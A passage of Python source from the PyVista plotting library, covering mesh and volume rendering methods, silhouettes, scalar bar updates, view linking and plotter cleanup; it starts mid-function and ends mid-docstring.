if lighting is None:
lighting = self._theme.lighting
if smooth_shading is None:
if pbr:
smooth_shading = True
else:
smooth_shading = self._theme.smooth_shading
# supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if render_points_as_spheres is None:
render_points_as_spheres = self._theme.render_points_as_spheres
if name is None:
name = f'{type(mesh).__name__}({mesh.memory_address})'
if nan_color is None:
nan_color = self._theme.nan_color
nan_color = parse_color(nan_color, opacity=nan_opacity)
if color is True:
color = self._theme.color
if texture is False:
texture = None
if culling is True:
culling = 'backface'
rgb = kwargs.pop('rgba', rgb)
feature_angle = kwargs.pop('feature_angle', 30)
# account for legacy behavior
if 'stitle' in kwargs: # pragma: no cover
warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning)
scalar_bar_args.setdefault('title', kwargs.pop('stitle'))
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
# first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalars specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise TypeError('scalars array must be given as a string name for multiblock datasets.')
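# Capture this call's arguments (as local variables) so that each
# block of the MultiBlock can be re-plotted below via ``add_mesh``
# with the same settings.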
the_arguments = locals()
the_arguments.pop('self')
the_arguments.pop('mesh')
the_arguments.pop('kwargs')
if multi_colors:
# Compute unique colors for each index of the block
if _has_matplotlib():
from itertools import cycle
import matplotlib
cycler = matplotlib.rcParams['axes.prop_cycle']
colors = cycle(cycler)
else:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, _vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
if silhouette:
if isinstance(silhouette, dict):
self.add_silhouette(mesh, silhouette)
else:
self.add_silhouette(mesh)
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalars components are not vectors/tuples
scalars = mesh.active_scalars_name
# Don't allow plotting of string arrays by default
if scalars is not None:# and np.issubdtype(mesh.active_scalars.dtype, np.number):
scalar_bar_args.setdefault('title', scalars)
else:
scalars = None
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
# enable rgb if the scalars name ends with rgb or rgba
if rgb is None:
if scalars.endswith('_rgb') or scalars.endswith('_rgba'):
rgb = True
original_scalar_name = scalars
scalars = get_array(mesh, scalars,
preference=preference, err=True)
scalar_bar_args.setdefault('title', original_scalar_name)
# Compute surface normals if using smooth shading
if smooth_shading:
mesh, scalars = prepare_smooth_shading(
mesh, scalars, texture, split_sharp_edges, feature_angle, preference
)
if mesh.n_points < 1:
raise ValueError('Empty meshes cannot be plotted. Input mesh has zero points.')
# set main values
self.mesh = mesh
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor = _vtk.vtkActor()
prop = _vtk.vtkProperty()
actor.SetMapper(self.mapper)
actor.SetProperty(prop)
if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (_vtk.vtkTexture, _vtk.vtkOpenGLTexture)):
raise TypeError(f'Invalid texture type ({type(texture)})')
if mesh.GetPointData().GetTCoords() is None:
raise ValueError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# see https://github.com/pyvista/pyvista/issues/950
mesh.set_active_scalars(None)
# Handle making opacity array
custom_opac, opacity = process_opacity(
mesh, opacity, preference, n_colors, scalars, use_transparency
)
# Scalars formatting ==================================================
if scalars is not None:
show_scalar_bar, n_colors, clim = self.mapper.set_scalars(
mesh, scalars, scalar_bar_args, rgb,
component, preference, interpolate_before_map,
custom_opac, annotations, log_scale, nan_color, above_color,
below_color, cmap, flip_scalars, opacity, categories, n_colors,
clim, self._theme, show_scalar_bar,
)
elif custom_opac: # no scalars but custom opacity
self.mapper.set_custom_opacity(
opacity, color, mesh, n_colors, preference,
interpolate_before_map, rgb, self._theme,
)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = self._theme.outline_color
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise ValueError('Invalid style. Must be one of the following:\n'
'\t"surface"\n'
'\t"wireframe"\n'
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if pbr:
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Physically based rendering requires VTK 9 '
'or newer')
prop.SetInterpolationToPBR()
prop.SetMetallic(metallic)
prop.SetRoughness(roughness)
elif smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color, default_color=self._theme.color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
geom = pyvista.Triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = parse_color('black')
geom.points -= geom.center
addr = actor.GetAddressAsString("")
self.renderer._labels[addr] = [geom, label, rgb_color]
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
self.add_actor(actor, reset_camera=reset_camera, name=name, culling=culling,
pickable=pickable, render=render)
# hide scalar bar if using special scalars
if scalar_bar_args.get('title') == '__custom_rgba':
show_scalar_bar = False
# Only show scalar bar if there are scalars
if show_scalar_bar and scalars is not None:
self.add_scalar_bar(**scalar_bar_args)
self.renderer.Modified()
return actor
def add_volume(self, volume, scalars=None, clim=None, resolution=None,
opacity='linear', n_colors=256, cmap=None, flip_scalars=False,
reset_camera=None, name=None, ambient=0.0, categories=False,
culling=False, multi_colors=False,
blending='composite', mapper=None,
scalar_bar_args=None, show_scalar_bar=None,
annotations=None, pickable=True, preference="point",
opacity_unit_distance=None, shade=False,
diffuse=0.7, specular=0.2, specular_power=10.0,
render=True, **kwargs):
"""Add a volume, rendered using a smart mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UniformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array with length equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If ``scalars`` is
``None``, then the active scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
resolution : list, optional
Block resolution. When ``volume`` is a 3D ``numpy.ndarray``, this
sets the grid spacing; defaults to ``[1, 1, 1]``.
opacity : str or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalars range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custom made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
cmap : str, optional
Name of the Matplotlib colormap to use when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene.
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults to ``False``.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored by cycling through 'Reds',
'Greens', 'Blues', 'Greys', 'Oranges', and 'Purples'.
blending : str, optional
Blending mode for visualisation of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'composite'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and
``'smart'``. If ``None`` the ``"volume_mapper"`` in the
``self._theme`` is used.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the
scalar bar to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If ``False``, a scalar bar will not be added to the
scene. Defaults to ``True``.
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float
values in the scalars range to annotate on the scalar bar
and the values are the string annotations.
pickable : bool, optional
Set whether this mesh is pickable.
preference : str, optional
When ``mesh.n_points == mesh.n_cells`` and setting
scalars, this parameter sets how the scalars will be
mapped to the mesh. The default, ``'points'``, causes the
scalars to be associated with the mesh points. Can be
either ``'points'`` or ``'cells'``.
opacity_unit_distance : float
Set/Get the unit distance on which the scalar opacity
transfer function is defined. Meaning that over that
distance, a given opacity (from the transfer function) is
accumulated. This is adjusted for the actual sampling
distance during rendering. By default, this is the length
of the diagonal of the bounding box of the volume divided
by the dimensions.
shade : bool
Default off. If shading is turned on, the mapper may
perform shading calculations - in some cases shading does
not apply (for example, in a maximum intensity projection)
and therefore shading will not be performed even if this
flag is on.
diffuse : float, optional
The diffuse lighting coefficient. Default ``0.7``.
specular : float, optional
The specular lighting coefficient. Default ``0.2``.
specular_power : float, optional
The specular power. Between ``0.0`` and ``128.0``.
render : bool, optional
Force a render when True. Default ``True``.
**kwargs : dict, optional
Optional keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the volume.
Examples
--------
Show a built-in volume example with the coolwarm colormap.
>>> from pyvista import examples
>>> import pyvista as pv
>>> bolt_nut = examples.download_bolt_nut()
>>> pl = pv.Plotter()
>>> _ = pl.add_volume(bolt_nut, cmap="coolwarm")
>>> pl.show()
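A 3D NumPy array can also be volume rendered directly. A minimal
sketch with random data (the array values and the opacity mapping
used here are arbitrary):
>>> import numpy as np
>>> vol = np.random.random((30, 30, 30))
>>> pl = pv.Plotter()
>>> _ = pl.add_volume(vol, opacity='linear')
>>> pl.show()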
"""
# Handle default arguments
# Supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
# Avoid mutating input
if scalar_bar_args is None:
scalar_bar_args = {}
else:
scalar_bar_args = scalar_bar_args.copy()
# account for legacy behavior
if 'stitle' in kwargs: # pragma: no cover
warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning)
scalar_bar_args.setdefault('title', kwargs.pop('stitle'))
if show_scalar_bar is None:
show_scalar_bar = self._theme.show_scalar_bar
if culling is True:
culling = 'backface'
if mapper is None:
mapper = self._theme.volume_mapper
# only render when the plotter has already been shown
if render is None:
render = not self._first_time
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1, 1, 1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError(f'Object type ({type(volume)}) not supported for plotting in PyVista.')
else:
# HACK: Make a copy so the original object is not altered.
# Also, place all data on the nodes as issues arise when
# volume rendering on the cells.
volume = volume.cell_data_to_point_data()
if name is None:
name = f'{type(volume).__name__}({volume.memory_address})'
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(block, resolution=block_resolution, opacity=opacity,
n_colors=n_colors, cmap=color, flip_scalars=flip_scalars,
reset_camera=reset_camera, name=next_name,
ambient=ambient, categories=categories,
culling=culling, clim=clim,
mapper=mapper, pickable=pickable,
opacity_unit_distance=opacity_unit_distance,
shade=shade, diffuse=diffuse, specular=specular,
specular_power=specular_power, render=render)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError(f'Type {type(volume)} not supported for volume rendering at this time. Use `pyvista.UniformGrid`.')
if opacity_unit_distance is None:
opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1)
if scalars is None:
# Make sure scalars components are not vectors/tuples
scalars = volume.active_scalars
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
scalar_bar_args.setdefault('title', volume.active_scalars_info[1])
else:
raise ValueError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data'
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars,
preference=preference, err=True)
scalar_bar_args.setdefault('title', title)
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool_ or scalars.dtype == np.uint8:
scalars = scalars.astype(np.float_)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point': _vtk.vtkFixedPointVolumeRayCastMapper,
'gpu': _vtk.vtkGPUVolumeRayCastMapper,
'open_gl': _vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart': _vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise TypeError(f"Mapper ({mapper}) unknown. Available volume mappers include: {', '.join(mappers.keys())}")
self.mapper = make_mapper(mappers[mapper])
# Scalars interpolation approach
if scalars.shape[0] == volume.n_points:
volume.point_data.set_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume.cell_data.set_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
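# Clip the scalars to ``clim`` and rescale them to the 0-255 range
# expected by the color and opacity transfer functions built below.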
scalars = scalars.astype(np.float_)
with np.errstate(invalid='ignore'):
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = clim[0]
scalars[idxs1] = clim[1]
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = _vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # Set default map if matplotlib is available
if _has_matplotlib():
cmap = self._theme.cmap
if cmap is not None:
if not _has_matplotlib():
raise ImportError('Please install matplotlib for volume rendering.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = _vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = _vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:,3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(_vtk.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError(f"Blending mode '{blending}' invalid. Please choose one of "
"'additive', 'average', 'composite', 'minimum', or 'maximum'.")
self.mapper.Update()
self.volume = _vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = _vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
prop.SetScalarOpacityUnitDistance(opacity_unit_distance)
prop.SetShade(shade)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(self.volume, reset_camera=reset_camera,
name=name, culling=culling,
pickable=pickable, render=render)
# Add scalar bar if scalars are available
if show_scalar_bar and scalars is not None:
self.add_scalar_bar(**scalar_bar_args)
self.renderer.Modified()
return actor
def add_silhouette(self, mesh, params=None):
"""Add a silhouette of a PyVista or VTK dataset to the scene.
A silhouette can also be generated directly in
:func:`add_mesh <pyvista.Plotter.add_mesh>`. See also
:ref:`silhouette_example`.
Parameters
----------
mesh : pyvista.PolyData
Mesh for generating silhouette to plot.
params : dict, optional
* If not supplied, the default theme values will be used.
* ``color``: ``str`` or 3-item ``list``, color of the silhouette
* ``line_width``: ``float``, edge width
* ``opacity``: ``float`` between 0 and 1, edge transparency
* ``feature_angle``: If a ``float``, display sharp edges
exceeding that angle in degrees.
* ``decimate``: ``float`` between 0 and 1, level of decimation
Returns
-------
vtk.vtkActor
VTK actor of the silhouette.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> bunny = examples.download_bunny()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(bunny, color='tan')
>>> _ = plotter.add_silhouette(bunny,
... params={'color': 'red', 'line_width': 8.0})
>>> plotter.view_xy()
>>> plotter.show()
"""
silhouette_params = self._theme.silhouette.to_dict()
if params:
silhouette_params.update(params)
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not isinstance(mesh, pyvista.PolyData):
raise TypeError(f"Expected type is `PolyData` but {type(mesh)} was given.")
if isinstance(silhouette_params["decimate"], float):
silhouette_mesh = mesh.decimate(silhouette_params["decimate"])
else:
silhouette_mesh = mesh
alg = _vtk.vtkPolyDataSilhouette()
alg.SetInputData(silhouette_mesh)
alg.SetCamera(self.renderer.camera)
if silhouette_params["feature_angle"] is not None:
alg.SetEnableFeatureAngle(True)
alg.SetFeatureAngle(silhouette_params["feature_angle"])
else:
alg.SetEnableFeatureAngle(False)
mapper = make_mapper(_vtk.vtkDataSetMapper)
mapper.SetInputConnection(alg.GetOutputPort())
actor, prop = self.add_actor(mapper)
prop.SetColor(parse_color(silhouette_params["color"]))
prop.SetOpacity(silhouette_params["opacity"])
prop.SetLineWidth(silhouette_params["line_width"])
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
clim : sequence
The new range of scalar bar. Two item list (e.g. ``[-1, 2]``).
name : str, optional
The title of the scalar bar to update.
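Examples
--------
A minimal sketch, assuming a mesh with a scalar array has already
been added so that an active mapper exists:
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(sphere, scalars='Data')
>>> pl.update_scalar_bar_range([-1.0, 1.0])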
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise AttributeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError(f'Name ({name}) not valid/not found in this plotter.')
return
def clear(self):
"""Clear plot by removing all actors and properties.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.clear()
>>> plotter.renderer.actors
{}
"""
self.renderers.clear()
self.scalar_bars.clear()
self.mesh = None
def link_views(self, views=0):
"""Link the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
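Examples
--------
A minimal sketch linking the cameras of a two-view plotter:
>>> import pyvista
>>> pl = pyvista.Plotter(shape=(1, 2))
>>> pl.subplot(0, 0)
>>> _ = pl.add_mesh(pyvista.Sphere())
>>> pl.subplot(0, 1)
>>> _ = pl.add_mesh(pyvista.Cube())
>>> pl.link_views()
>>> pl.show()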
"""
if isinstance(views, (int, np.integer)):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
return
views = np.asarray(views)
if np.issubdtype(views.dtype, np.integer):
for view_index in views:
self.renderers[view_index].camera = \
self.renderers[views[0]].camera
else:
raise TypeError('Expected type is int, list or tuple: '
f'{type(views)} is given')
def unlink_views(self, views=None):
"""Unlink the views' cameras.
Parameters
----------
views : None, int, tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
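Examples
--------
A minimal sketch that links two views and then unlinks them again:
>>> import pyvista
>>> pl = pyvista.Plotter(shape=(1, 2))
>>> pl.link_views()
>>> pl.unlink_views()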
"""
if views is None:
for renderer in self.renderers:
renderer.camera = Camera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = Camera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.abc.Iterable):
for view_index in views:
self.renderers[view_index].camera = Camera()
self.renderers[view_index].reset_camera()
else:
raise TypeError('Expected type is None, int, list or tuple: '
f'{type(views)} is given')
@wraps(ScalarBars.add_scalar_bar)
def add_scalar_bar(self, *args, **kwargs):
"""Wrap for ``ScalarBars.add_scalar_bar``."""
# only render when the plotter has already been shown
render = kwargs.get('render', None)
if render is None:
kwargs['render'] = not self._first_time
# check if mapper exists
mapper = kwargs.get('mapper', None)
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise AttributeError('Mapper does not exist. '
'Add a mesh with scalars first.')
kwargs['mapper'] = self.mapper
# title can be the first and only arg
if len(args):
title = args[0]
else:
title = kwargs.get('title', '')
if title is None:
title = ''
kwargs['title'] = title
interactive = kwargs.get('interactive', None)
if interactive is None:
interactive = self._theme.interactive
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
raise ValueError('Interactive scalar bars disabled for multi-renderer plots')
# by default, use the plotter local theme
kwargs.setdefault('theme', self._theme)
return self.scalar_bars.add_scalar_bar(**kwargs)
def update_scalars(self, scalars, mesh=None, render=True):
"""Update scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Force a render when True. Default ``True``.
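Examples
--------
A minimal sketch replacing the scalars of a mesh that is already in
the scene (``render=False`` avoids forcing a render here):
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(sphere, scalars='Data')
>>> pl.update_scalars(sphere.points[:, 0], mesh=sphere, render=False)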
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.abc.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.render()
return
if isinstance(scalars, str):
# Grab scalars array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise ValueError('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalars array is modified by this function...
mesh.GetPoints().Modified()
except AttributeError:
pass
if render:
self.render()
def update_coordinates(self, points, mesh=None, render=True):
"""Update the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Force a render when True. Default ``True``.
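Examples
--------
A minimal sketch shifting a mesh that is already in the scene:
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(sphere)
>>> pl.update_coordinates(sphere.points + [0, 0, 1], mesh=sphere, render=False)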
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
# only render when the plotter has already been shown
if render is None:
render = not self._first_time
if render:
self.render()
def _clear_ren_win(self):
"""Clear the render window."""
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
def close(self, render=False):
"""Close the render window.
Parameters
----------
render : bool
Unused argument.
"""
# optionally run just prior to exiting the plotter
if self._before_close_callback is not None:
self._before_close_callback(self)
self._before_close_callback = None
# must close out widgets first
super().close()
# Renderer has an axes widget, so close it
self.renderers.close()
self.renderers.remove_all_lights()
# Grab screenshots of last render
if self._store_image:
self.last_image = self.screenshot(None, return_img=True)
self.last_image_depth = self.get_image_depth()
# reset scalar bars
self.clear()
# grab the display id before clearing the window
# this is an experimental feature
if KILL_DISPLAY: # pragma: no cover
disp_id = None
if hasattr(self, 'ren_win'):
disp_id = self.ren_win.GetGenericDisplayId()
self._clear_ren_win()
if self.iren is not None:
self.iren.remove_observers()
self.iren.terminate_app()
if KILL_DISPLAY: # pragma: no cover
_kill_display(disp_id)
self.iren = None
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
# this helps managing closed plotters
self._closed = True
def deep_clean(self):
"""Clean the plotter of the memory."""
if hasattr(self, 'renderers'):
self.renderers.deep_clean()
if getattr(self, 'mesh', None) is not None:
self.mesh.point_data = None
self.mesh.cell_data = None
self.mesh = None
if getattr(self, 'mapper', None) is not None:
self.mapper.lookup_table = None
self.mapper = None
self.volume = None
self.textActor = None
def add_text(self, text, position='upper_left', font_size=18, color=None,
font=None, shadow=False, name=None, viewport=False):
"""Add text to plot object in the top left corner by default.
Parameters
----------
